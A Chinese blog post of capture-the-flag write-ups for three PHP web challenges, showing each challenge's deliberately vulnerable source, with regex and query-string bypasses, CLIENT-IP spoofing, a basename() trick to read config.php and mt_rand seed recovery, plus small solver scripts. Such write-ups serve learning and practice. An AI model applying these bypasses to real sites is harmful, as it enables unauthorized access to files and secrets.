php特性函数(正则\漏洞函数)

最新推荐文章于 2023-11-05 17:01:48 发布
最新推荐文章于 2023-11-05 17:01:48 发布
阅读量448 收藏
点赞数
文章标签: java 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_62046696/article/details/126468899
版权

[MRCTF2020]套娃

打开界面发现源码,

第一关

$query = $_SERVER['QUERY_STRING'];的意思就是返回?后的值
第一个if是检查,有没有下划线  %5f下划线的编码 所以我们要达到的效果就是?传参没有_下划线

 利用PHP的字符串解析特性Bypass - FreeBuf网络安全行业门户

空格、+ - [ .  都可以换成_,我们这里用空格代替

 第二个if是强比较不等于2333,后面正则2开头3结束格式,这样我们就只能在%0a进行换行绕过

 第二关

 看见源码注释掉了,看了大佬的wp,说这是JsFuck加密,我还真没听说过

把他复制到控制器,运行

获得提示,让我们传参Merak,随便传入一个值 比如Merak=sfsf 

第三关

Flag is here~But how to get it? <?php 
error_reporting(0); 
include 'takeip.php';
ini_set('open_basedir','.'); 
include 'flag.php';

if(isset($_POST['Merak'])){ 
    highlight_file(__FILE__); 
    die(); 
} 


function change($v){ 
    $v = base64_decode($v); 
    $re = ''; 
    for($i=0;$i<strlen($v);$i++){ 
        $re .= chr ( ord ($v[$i]) + $i*2 ); 
    } 
    return $re; 
}
echo 'Local access only!'."<br/>";
$ip = getIp();
if($ip!='127.0.0.1')
echo "Sorry,you don't have permission!  Your ip is :".$ip;
if($ip === '127.0.0.1' && file_get_contents($_GET['2333']) === 'todat is a happy day' ){
echo "Your REQUEST is:".change($_GET['file']);
echo file_get_contents(change($_GET['file'])); }
?>

首先第一个if是判断 是否是本地ip地址

然后file_get_contents($_GET['2333']) === 'todat is a happy day'  data读取

 可是到这里ip已经用插件设置了127.0.0.1,没通过,百度一下

CLIENT-IP: 127.0.0.1  这里x-forwarded-for失效了

成功,最后看change的作用, $v = base64_decode($v)里面是base64解码,所以我们传参需要先编码,也就是flag.php  每个字符加 i*2

所以我们先减在传入

c='flag.php'
for num in range(0,8):
    a = chr(int(ord(c[num])) - num * 2)
    print(str(a),end="")

得到,fj]a&f\b直接base64编码传入就可以了

[Zer0pts2020]Can you guess it?

<?php
include 'config.php'; // FLAG is defined in config.php

if (preg_match('/config\.php\/*$/i', $_SERVER['PHP_SELF'])) {
  exit("I don't know what you are thinking, but I won't let you read it :)");
}

if (isset($_GET['source'])) {
  highlight_file(basename($_SERVER['PHP_SELF']));
  exit();
}

$secret = bin2hex(random_bytes(64));
if (isset($_POST['guess'])) {
  $guess = (string) $_POST['guess'];
  if (hash_equals($secret, $guess)) {
    $message = 'Congratulations! The flag is: ' . FLAG;
  } else {
    $message = 'Wrong.';
  }
}
?>

$_SERVER['PHP_SELF']是当前执行的脚本名,比如url是:http://xxx/index.php     $SERVER['PHP_SELF']的值就是index.php

如果url是:http://xxx/index.php/a.php/a/b/c/d/?a=1   $_SERVER['PHP_SELF']的值就是index.php/a.php/a/b/c/d/  (忽略传参)

hash_equals($secret, $guess)是判断两个参数是否相等

bin2hex  字符串转为十六进制

该函数以字符串形式返回加密安全的随机字节  random_bytes

本来觉得突破口是两个参数相等,然后得到flag,可是是随机生成的,那看看别的点 

源码里有一句:

highlight_file(basename($_SERVER['PHP_SELF']));

如果url是:http://xxx/index.php/a      basename($_SERVER['PHP_SELF'])的值就是a  (只看最后一个/后面的,同样忽略传参)

正则:/config\.php\/*$/i  最后是个*,传一个中文字符(打印不出来),正则就会失效

题目给出了flag在config.php,我们要得到这个php,如果访问index.php/config.php,其实依然是index.php的界面

 这道题给出了basename()的漏洞,只看最后一个/的后面,而且忽略上传参数

比如$path是/var/www/html/index.php,那么basename($path);得到的就是index.php。

<?php
function check($str){
    return preg_match('/config\.php\/*$/i', $str);
}

for($i=0;$i<255;$i++){
    $str="/index.php/config.php/".chr($i);
    if(!check($str)){
        echo $i.":".basename($str);
        echo "<br>";
    }
}

ASCII值范围为0-255,但ASCII码并没有规定编号为128~255的字符,ASCII表范围为0-127,也就是我们传入128以上的数值,即可绕过正则,128 -> 0x80

 这样既可以访问config.php,也可以绕过正则

还有几个中文符号也可以比如:?中文汉字都可以,打印不出来

[GWCTF 2019]枯燥的抽奖

打开界面

一看见想的本来是爆破,然后想了一下,不行呀这样得爆破到猴年马月,也不是有一部分对就是回显别的汉字。看一下源码

看见了个地址, 

 访问得到,源码

jgBHnUZqTT

<?php
#这不是抽奖程序的源代码!不许看!
header("Content-Type: text/html;charset=utf-8");
session_start();
if(!isset($_SESSION['seed'])){
$_SESSION['seed']=rand(0,999999999);
}

mt_srand($_SESSION['seed']);   这是赋予的一个seed种子
$str_long1 = "abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ";
$str='';
$len1=20;
for ( $i = 0; $i < $len1; $i++ ){
    $str.=substr($str_long1, mt_rand(0, strlen($str_long1) - 1), 1);       
}
$str_show = substr($str, 0, 10);
echo "<p id='p1'>".$str_show."</p>";


if(isset($_POST['num'])){
    if($_POST['num']===$str){x
        echo "<p id=flag>抽奖,就是那么枯燥且无味,给你flag{xxxxxxxxx}</p>";
    }
    else{
        echo "<p id=flag>没抽中哦,再试试吧</p>";
    }
}
show_source("check.php");

    $str.=substr($str_long1, mt_rand(0, strlen($str_long1) - 1), 1);       
表面,这是一个随机0-strlen的随机,可是mt_rand通过一种复杂的运算存在规律

我们可以通过第一个值,也就是给出的jgBHnUZqTT通过一定的运算可以推算出下面的值,拼接形成flag

知识点:PHP mt_rand安全杂谈及应用场景详解 - FreeBuf网络安全行业门户

首先,第一步我们先将给出的第一段字符换成数字

str1="jgBHnUZqTT"
str2= "abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ";
length=str(len(str2)-1)
result=''
for i in range(0,len(str1)):
    for j in range(0,len(str2)):
        if str2[j]==str1[i]:
            result+=str(j)+' '+str(j)+' '+'0'+' '+length+' '
print(result)

 

9 9 0 61 6 6 0 61 37 37 0 61 43 43 0 61 13 13 0 61 56 56 0 61 61 61 0 61 16 16 0 61 55 55 0 61 55 55 0 61  

以上面生成的随机数为例,假设我们知道了第一个生成的随机数,那我们怎么预测种子呢?
那就要用到php_mt_seed这个工具了。

得到的seed为209641505 ,根据seed去得到密文就行了,要用php7.1及以上版本的

<?php
mt_srand(209641505);

$str_long1 = "abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ";
$str='';
$len1=20;
for ( $i = 0; $i < $len1; $i++ ){
    $str.=substr($str_long1, mt_rand(0, strlen($str_long1) - 1), 1);       
}
echo $str;
?>

 

然后php这段代码,需要用php7.1+的版本,否则的出来的不太一样,因为seed提示了php版本,输入得到flag

 

偶尔躲躲乌云334
关注
php正则表达漏洞,一个PHP正则相关的“经典漏洞
weixin_29504571的博客
04-02 232
小密圈《代码审计》中看到P神发的“经典漏洞”,关于写配置文件这个功能点。问题代码$str = addslashes($_GET['option']);$file = file_get_contents('xxxxx/option.php');$file = preg_replace('|\$option=\'.*\';|',"\$option='$str';",$file);file_put_co...
PHP正则经典漏洞
weixin_30819085的博客
03-01 176
@author: Dlive P牛在小密圈中发的一个有关使用PHP正则配合写配置文件导致Getshell的经典漏洞 漏洞代码是这样的: <?php //ph.php $str = addslashes($_GET['option']); $file = file_get_contents('option.php'); $file = preg_replace('|\$option=\'.*\...
php 防注入 正则,PHP正则表达式漏洞下注
weixin_34917128的博客
03-09 203
没有一个步骤或完全直接的方式来利用你的代码,但这里有一些想法.你在这个例子中传递给copy(),但是你已经提到你已经使用这个方法验证文件ext了一段时间,所以我假设你有其他情况可能已经使用这个过程与其他功能在不同的PHP版本.将其视为测试程序(Exploiting include,require):$name = "test.PHP#.txt";if (preg_match('/\.(xml|cs...
slim框架中防止crsf攻击时,用到的函数hash_equals
weixin_34204057的博客
10-24 130
  1.防止crsf攻击的最多解决方案就是 为每个请求生成一个唯一 token ,验证来源于客户端 HTML 表单产生的 POST等请求 .    2.这个token默认放在session中.   slim框架源码中生成方式 如下: 1 &lt;?php 2 //生成name和token 3 $name = uniqid($this-&gt;prefix); 4 $token = bin2h...
basename函数漏洞之[Zer0pts2020]Can you guess it?
qq_58970968的博客
08-26 388
这里正则的绕过,不能让config.php结尾,在它后面加点东西就可以了,比如/a 等等,但是为了使后面的basename得到的结果为config.php,这后面加的东西不能乱加,那么就加非ASCII码的字符就行啦,给个脚本吧。basename 函数,获取路径中的文件名;比如:test/inde.php/s 就会返回index,php。但是漏洞就是,它会去掉文件名开头的或者结尾的非ASCII值!...
比较好用的PHP防注入漏洞过滤函数代码
12-18
标题中的“比较好用的PHP防注入漏洞过滤函数代码”指的是一个PHP代码片段,用于保护Web应用程序免受SQL注入攻击。这种攻击通常是通过恶意用户输入含有SQL命令的参数,以执行未授权的操作。以下是对该代码的详细解释...
分享自定义的几个PHP功能函数
10-24
本文主要分享了一系列自定义的PHP函数,这些函数在日常的Web开发中使用频繁,比如进行表单提交的过滤、字符串的截取、IP地址的匿名化处理和隐藏文件的真实路径等。 首先,提交过滤函数filter($text)用于清除提交的...
php用户注册信息验证正则表达式
10-23
这里的关键在于定义好合适的正则表达式,并通过`preg_match()`函数PHP中实现对正则表达式的匹配。 总之,通过合理地使用正则表达式,可以有效地对用户注册时输入的信息进行严格的验证。这不仅提高了用户信息的...
php5.3 废弃函数小结
10-29
例如,魔法引号可能导致安全漏洞,而`ereg()`系列函数在性能上比`preg_match()`等函数要慢。同时,随着MySQLi和PDO的推广,旧的MySQL扩展逐渐被淘汰,以提供更好的数据库操作支持。 开发者在升级到PHP 5.3或更高...
hash写equals需要注意的地方
Jacky Li的专栏
09-26 579
 碰到这样一个问题,我在用hashmap的时候,map.containsKey(key)我希望调用的是自己的equals方法,但是map就是不肯调用我的equals后来解决了,因为hashmap用的是hash算法,equals比较特别除了写equals,还要写一个public int hashCode() ...{// TODO Auto-generated method stubre
ctfshow php特性
m0_63253040的博客
08-01 330
有个正则匹配0-9数字,,输出flag的条件是要变量num为整数,直接用数组绕过就行了。
PHP中hash绕过和常用函数
最新发布
qq_42739469的博客
11-05 393
引言:在ctf比赛中常常会涉及到一些哈希密码的绕过问题。今天基于一些PHP特性,记录一些绕过方法。
[Zer0pts2020]Can you guess it?(basename漏洞
qq_54929891的博客
03-22 3113
点击source <?php include 'config.php'; // FLAG is defined in config.php if (preg_match('/config\.php\/*$/i', $_SERVER['PHP_SELF'])) { exit("I don't know what you are thinking, but I won't let you read it :)"); } if (isset($_GET['source'])) { highl
[MRCTF2020] - Web
qtL0ng的博客
07-01 1084
[MRCTF2020]套娃 打开题目查看源码 <!-- //1st $query = $_SERVER['QUERY_STRING']; if( substr_count($query, '_') !== 0 || substr_count($query, '%5f') != 0 ){ die('Y0u are So cutE!'); } if($_GET['b_u_p_t'] !== '23333' && preg_match('/^23333$/', $_GET['b
GWCTF 2019]枯燥的抽奖
zxnimud5的专栏
09-12 537
php伪随机 <?php #这不是抽奖程序的源代码!不许看! header("Content-Type:text/html;charset=utf-8"); session_start(); if(!isset($_SESSION['seed'])){ $_SESSION['seed']=rand(0,999999999); } mt_srand($_SESSION['seed']); $str_long1="abcdefghijklmnopqrstuvwxyz0123456789ABCDEF...
[php_07]php文件系统
骑着代码去流浪
06-06 514
1.读取文件内容 PHP具有丰富的文件操作函数,最简单的读取文件的函数为file_get_contents,可以将整个文件全部读取到一个字符串中。 $content = file_get_contents('./test.txt'); file_get_contents也可以通过参数控制读取内容的开始点以及长度。 $content = file_get_contents('./test.t
[GWCTF 2019]枯燥的抽奖
qq_52907838的博客
08-20 741
打开环境,让我们猜号,还要猜中全部20位才能得flag??!! 看一下前端源码,看到个check.php: 访问一下果然有东西: <?php #这不是抽奖程序的源代码!不许看! header("Content-Type: text/html;charset=utf-8");//防止页面乱码 session_start();//创建新会话或者重用现有会话 if(!isset($_SESSION['seed'])){ $_SESSION['seed']=rand(0,999999999).
获取url参数
weixin_30872789的博客
11-01 204
实例:1,http://localhost/aaa/(打开aaa中的index.php)结果:$_SERVER['QUERY_STRING'] = "";$_SERVER['REQUEST_URI']= "/aaa/";$_SERVER['SCRIPT_NAME']= "/aaa/index.php";$_SERVER['PHP_SELF']= "/aaa/index.php"...
PHP正则表达式
未完成的歌~的博客
04-29 1943
一、正则表达式语法规则 描述了一类字符串的特征,然后通过这个特征可以配合一些特定的函数,来完成对字符串更加复杂的一系列操作! 普通字符和特殊字符组成的一个字符串 二、定界符 我们一般习惯使用正斜线"/"作为定界的字符,前后一致 三、普通字符 四、元字符 \d 匹配任意一个十进制数字,等价于[0-9] \D 匹配任意一个除十进制数字以外字符,等价于[^0-9] \s 匹配任意一个空白字符,比如换页符...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值